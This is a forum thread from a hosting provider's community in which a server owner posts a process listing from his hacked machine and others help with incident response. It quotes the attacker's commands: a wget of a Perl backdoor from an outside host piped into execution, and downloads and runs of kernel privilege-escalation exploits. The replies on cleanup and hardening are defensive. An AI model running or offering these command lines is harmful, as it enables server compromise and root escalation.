Hacked
> metrowebworks:/home/ronpoz# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan23 ? 00:00:00 init [2]
root 2 1 0 Jan23 ? 00:00:04 [keventd]
root 3 1 0 Jan23 ? 00:00:00 [ksoftirqd_CPU0]
root 4 1 0 Jan23 ? 00:00:44 [kswapd]
root 5 1 0 Jan23 ? 00:00:00 [bdflush]
root 6 1 0 Jan23 ? 00:00:00 [kupdated]
root 7 1 0 Jan23 ? 00:00:00 [jfsIO]
root 8 1 0 Jan23 ? 00:00:00 [jfsCommit]
root 9 1 0 Jan23 ? 00:00:00 [jfsSync]
root 10 1 0 Jan23 ? 00:00:00 [xfsbufd]
root 11 1 0 Jan23 ? 00:00:00 [xfslogd/0]
root 12 1 0 Jan23 ? 00:00:00 [xfsdatad/0]
root 13 1 0 Jan23 ? 00:00:00 [mdrecoveryd]
root 14 1 0 Jan23 ? 00:00:00 [kjournald]
root 60 1 0 Jan23 ? 00:00:00 [kjournald]
root 218 1 0 Jan23 ? 00:00:00 /usr/sbin/courierlogger -pid=/var/run/courier/authdaemon/pid -start /usr/lib/c
root 219 218 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 221 219 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 222 219 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 223 219 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 224 219 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 225 219 0 Jan23 ? 00:00:00 /usr/lib/courier/authlib/authdaemond.plain
root 230 1 0 Jan23 ? 00:00:00 /usr/sbin/couriertcpd -address=0.0.0.0 -stderrlogger=/usr/sbin/courierlogger -
root 233 1 0 Jan23 ? 00:00:00 /usr/sbin/courierlogger imaplogin
root 238 1 0 Jan23 ? 00:00:00 /usr/sbin/couriertcpd -pid=/var/run/courier/pop3d.pid -stderrlogger=/usr/sbin/
root 243 1 0 Jan23 ? 00:00:00 /usr/sbin/courierlogger courierpop3login
root 245 1 0 Jan23 ? 00:00:00 /usr/sbin/inetd
root 252 1 0 Jan23 ? 00:00:00 /bin/sh /usr/bin/safe_mysqld
mysql 287 252 0 Jan23 ? 00:00:00 /usr/sbin/mysqld –basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-fi
mysql 289 287 0 Jan23 ? 00:00:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-fi
mysql 290 289 0 Jan23 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-fi
mysql 291 289 0 Jan23 ? 00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-fi
root 408 1 0 Jan23 ? 00:00:00 /usr/sbin/cron
root 424 1 0 Jan23 tty0 00:00:00 /sbin/getty 38400 tty0
root 4912 1 0 Jan25 ? 00:00:00 /usr/sbin/sshd
www-data 6812 1 0 Jan26 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;wget underground.ae21vek.ru/bs.pl;perl ./bs.pl;
www-data 6814 6812 0 Jan26 ? 00:00:00 perl ./bs.pl
www-data 6815 6814 0 Jan26 ? 00:00:00 [bash
] www-data 9689 1 0 15:24 ? 00:00:00 ./cgi
www-data 9693 9689 0 15:25 ? 00:00:00 ./cgi
www-data 9694 9693 0 15:25 ttyp0 00:00:00 sh -i
www-data 9705 9694 0 15:26 ttyp0 00:00:00 [elflbl]
www-data 9706 9705 0 15:26 ttyp0 00:00:00 [elflbl
] www-data 9713 9694 0 15:28 ttyp0 00:00:00 ./mremap2
www-data 9714 9713 0 15:28 ttyp0 00:00:00 ./mremap2
www-data 9716 9689 0 15:28 ? 00:00:00 ./cgi
www-data 9717 9716 0 15:28 ttyp1 00:00:00 sh -i
www-data 9739 9717 0 15:32 ttyp1 00:00:00 ./mremap2
www-data 9740 9739 0 15:32 ttyp1 00:00:00 ./mremap2
www-data 9980 1 0 16:15 ? 00:00:00 ./bind
www-data 10113 1 0 16:28 ? 00:00:00 ./elflbl -l /tmp/elflib -n2 -f
www-data 10114 1 12 16:28 ? 00:04:47 [elflbl]
www-data 10134 1 0 16:28 ? 00:00:00 ./elflbl -l elflib -n2 -f
www-data 10135 1 12 16:28 ? 00:04:26 [elflbl]
www-data 10146 1 0 16:30 ? 00:00:00 ./elflbl -l elflib -n2 -f
www-data 10147 1 11 16:30 ? 00:04:03 [elflbl]
www-data 10152 1 0 16:30 ? 00:00:01 ./elflbl -l fsdfsd -n2 -f
www-data 10153 1 0 16:30 ? 00:00:01 ./elflbl -l fsdfsd -n2 -f
www-data 10154 1 0 16:30 ? 00:00:00 ./elflbl -l fsdfsd -n2 -f
www-data 10155 1 11 16:30 ? 00:03:52 [elflbl]
www-data 10162 1 0 16:31 ? 00:00:00 ./elflbl -l hfasdufhasudhfasdhfusdhfusdhf
www-data 10163 1 10 16:31 ? 00:03:39 [elflbl]
www-data 10165 1 0 16:31 ? 00:00:00 ./elflbl -l elflib
www-data 10166 1 10 16:31 ? 00:03:37 [elflbl]
www-data 10168 1 0 16:32 ? 00:00:00 ./elflbl -l elflib -n5 -f
www-data 10169 1 10 16:32 ? 00:03:35 [elflbl]
www-data 10172 1 0 16:32 ? 00:00:00 ./elflbl -l elflib -n2 -f
www-data 10173 1 10 16:32 ? 00:03:33 [elflbl]
www-data 10175 1 0 16:32 ? 00:00:00 ./elflbl -l /tmp/elflib -n2 -f
www-data 10176 1 10 16:32 ? 00:03:33 [elflbl]
root 10295 4912 0 17:04 ? 00:00:00 /usr/sbin/sshd
ronpoz 10297 10295 0 17:04 ? 00:00:00 /usr/sbin/sshd
ronpoz 10298 10297 0 17:04 pts/0 00:00:00 -bash
root 10306 10298 1 17:05 pts/0 00:00:00 bash
root 10315 1 0 17:05 ? 00:00:00 /usr/sbin/apache
www-data 10316 10315 0 17:05 ? 00:00:00 /usr/sbin/apache
www-data 10317 10315 0 17:05 ? 00:00:00 /usr/sbin/apache
www-data 10318 10315 0 17:05 ? 00:00:00 /usr/sbin/apache
www-data 10319 10315 0 17:05 ? 00:00:00 /usr/sbin/apache
www-data 10320 10315 0 17:05 ? 00:00:00 /usr/sbin/apache
root 10321 10306 0 17:05 pts/0 00:00:00 ps -ef
10 Replies
caker
Linode Staff
-Chris
> www-data 9694 9693 0 15:25 ttyp0 00:00:00 sh -i
After getting a shell your attacker most likely used wget to download files like elflbl and mremap2. I don't know what they do but odds are very likely your attacker will have downloaded a rootkit and attempted to use it too.
Much as it's tempting to kill the scripts first, it's a good idea to perform a little research so you can find the executables. The /proc filesystem will tell you (among other things) where the executables are, by way of a symlink, which can be very handy. For example, running this command as root should tell you where the mremap2 executable is located:
# ls -l /proc/9713/exe
After you've figured out where all the suspect executables are, you can now kill all those scripts. As root:
# killall elflbl mremap2 cgi
# kill 6814 6812
(if killing them this way doesn't work, try again using "-9" after the kill command)
Then to prevent them connecting to the same code again, block port 3131: (It's by no means a proper solution as the port is trivially changed, but it does buy you more time.)
# iptables -A INPUT -p tcp --dport 3131 -j DROP
Now, if you don't already have it, install chkrootkit
However, before running it, stop your network support entirely and continue working in lish. How you do this depends on your distro but "/etc/init.d/network stop" is normally a good bet. Failing that, "ifconfig eth0 down" should do the trick. Remember that if you're connected via SSH you won't receive a prompt after doing this so you'll need to connect to the lish console to carry on. (This is so that nobody can take advantage of your server while you're investigating it).
After running chkrootkit, it'll tell you if you have any 'infected' programs. Obviously you shouldn't use just one tool to tell if you have any, but I'm not sure of any others.
If you don't have any, the next step is to find the directory where your attacker uploaded this stuff to. Mostly these would be directories that can already be uploaded to - for example, forums have avatar upload functions that could theoretically be vulnerable to an attack like this. If you took note of the location of the executables earlier you've probably already nailed it. Otherwise, You're looking for files named elflbl, mremap2 or cgi specifically, although there'll probably be others too. Also, be aware that they may be scattered around the drive - attackers like to do that.
It may also be worth checking the .bashhistory file for root or any other users which may be affected (especially www-data, if you have one for that user). This may not reveal much though as logging to .bashhistory files is easily disabled and the files are also easily editable by the user - plus, if you had to kill the sh session with -9 above, it won't have been able to write to the history file.
Before bringing the system back up you should also change your root password and double-check your ps listing to make sure there aren't any suspicious processes, especially ones owned by www-data or root.
You may think this sounds like a lot but in actual fact it's not a lot at all. Your attacker may have edited the /etc/init.d/ or crontab files to download the files again at startup or at regular intervals. chkrootkit may not have detected a rootkit when there actually is one… etc, etc. If you want to be truly secure, back up your data (making sure it is just data - no binaries, etc) and reinstall the OS from the Distribution Wizard. Then restore your data and other settings. Yes, it takes a long time but unfortunately it's hard to make sure you're utterly clean otherwise.
Of course, you should also make sure you upgrade whatever script was vulnerable to the attack in the first place otherwise you'd just go through all this again next time round too.
People might call me paranoid. But when it comes to security it's better to be paranoid than to be lax. In my opinion, anyway.
> w
df -h
uname -a
ps x
cd /etc/httpd
ls
locate httpd.conf
cd /etc/apache
ls
cat httpd.conf|grep ServerName
ls
cd tmp
cd tmp
cd /tmp
ls
uname -a
/dev/smb
/dev/shm
id
wget
http://www.priv8crew.info/xpl/priv8smp ./priv8smp
chmod priv8smb 7
chmod 777 priv8smb
chmod 777 priv8smp
./priv8smp
wget
http://www.priv8crew.info/xpl/priv8uselib chmod 777priv8uselib
chmod 777 priv8uselib
./priv8uselib
wget
http://www.priv8crew.info/xpl/brk2 chmod 777 brk2
./brk2
./brk2
wget
http://www.priv8crew.info/xpl/belflbl wget
http://www.priv8crew.info/xpl/belflbl wget [-] Unable to determine kernel address: Operation not supportedwg
wget
http://www.priv8crew.info/xpl/elflbl chmod 777 elflbl
./elflbl
rm -f *
exit
ls
cd /var/tmp/.dc
ls
gcc
wget
http://packetstormsecurity.org/0501-exploits/uselib24.c gcc uselib24.c -o uselib24
ls
./brk
di
id
ls
./elflbl
touch /dev/shm/elflib
cd /dev/shm/
cd /dev/
mkdir shm
./elflbl -l /tmp/elflib
cd /var/tmp/.dc
./elflbl -l /tmp/elflib
./elflbl -l /tmp/elflib -n2 -f
id
ls
./elflbl -n2 -f
./elflbl -l /tmp/elflib -n2 -f
./elflbl -l elflib -n2 -f
cd /va/tmp/.dc
cd /var/tmp/.dc
ls
id
./elflbl -l elflib -n2 -f
./elflbl -l elflib -n2 -f
cd /var/tmp/.dc
ls
./elflbl -l fsdfsd -n2 -f
ls
id
uname -a
cd /var/tmp/.dc
./elflbl -l hfasdufhasudhfasdhfusdhfusdhf
./elflbl -l elflib
./elflbl -l elflib -n5 -f
./elflbl -l elflib -n2 -f
ls
id
uname -a
cd /var/tmp/.dc
./elflbl -l hfasdufhasudhfasdhfusdhfusdhf
./elflbl -l elflib
./elflbl -l elflib -n5 -f
./elflbl -l elflib -n2 -f
./elflbl -l elflib -n2 -f
./elflbl -l /tmp/elflib -n2 -f
id
ls
id
uname -a
cd /var/tmp/.dc
./elflbl -l hfasdufhasudhfasdhfusdhfusdhf
./elflbl -l elflib
./elflbl -l elflib -n5 -f
./elflbl -l elflib -n2 -f
./elflbl -l elflib -n2 -f
./elflbl -l /tmp/elflib -n2 -f
id
uname -a
Found the exes, deleted, removing phpbb as I dont use it.
@Ciaran:
Someone managed to exploit code on your website and got it to run a command which downloaded a malicious Perl script and opened a port on the server (port 3131, if you want to block it in iptables) which gives anyone connecting to it a shell as whichever user the script was run under - in this case, www-data.
Ciaran, thank you for this very detailed response. I was able to take your advice and dig myself out. I have patched most software as well as getting my firewall up.
Again, thanks….
Ron
Whoa! Mad props to Ciaran! That was amazing, I'm glad to know there's guys like you out there with the knowledge and are more than happy to give such a detailed response where this looks pretty serious.
Will be taking down Awstats until further notice.
By the way, one thing I forgot to mention is that running the following command as root will tell you what programs are acting as servers on your box:
# netstat -nptl
Despite the similarity, this command has nothing to do with the NPTL issue discussed elsewhere in the forums where you need to move /lib/tls to /lib/tls-disabled - it just happens to be four separate switches that I normally arrange in that order because it's a little easier to remember.
More victims:
